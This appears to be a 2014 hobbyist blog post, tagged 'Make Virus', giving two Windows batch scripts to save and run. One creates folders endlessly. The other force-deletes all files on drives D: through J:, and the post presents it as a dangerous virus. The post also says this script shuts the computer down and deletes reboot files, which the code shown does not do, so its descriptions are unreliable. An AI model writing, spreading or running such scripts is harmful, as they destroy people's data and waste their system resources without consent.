Showing posts with label Make Virus. Show all posts
Showing posts with label Make Virus. Show all posts

Tuesday, 8 April 2014

Create more than 3,000 folders under a minute

Open your notepad and type
the following code.

@echo off
:top
md %random%
goto top

Save it as 1000.bat

Run it

Make Danger Virus which can Shutdown the Computer and delete reboot files

1. Open Notepad Copy this text in that

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q


2. Then save it as kinng.bat and the batch file is created.

WARNING :: This is the most dangerous virus

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER – DO NOT CLICK THIS FILE. (for the idiots)

>>Also remember this might not work with vista.<<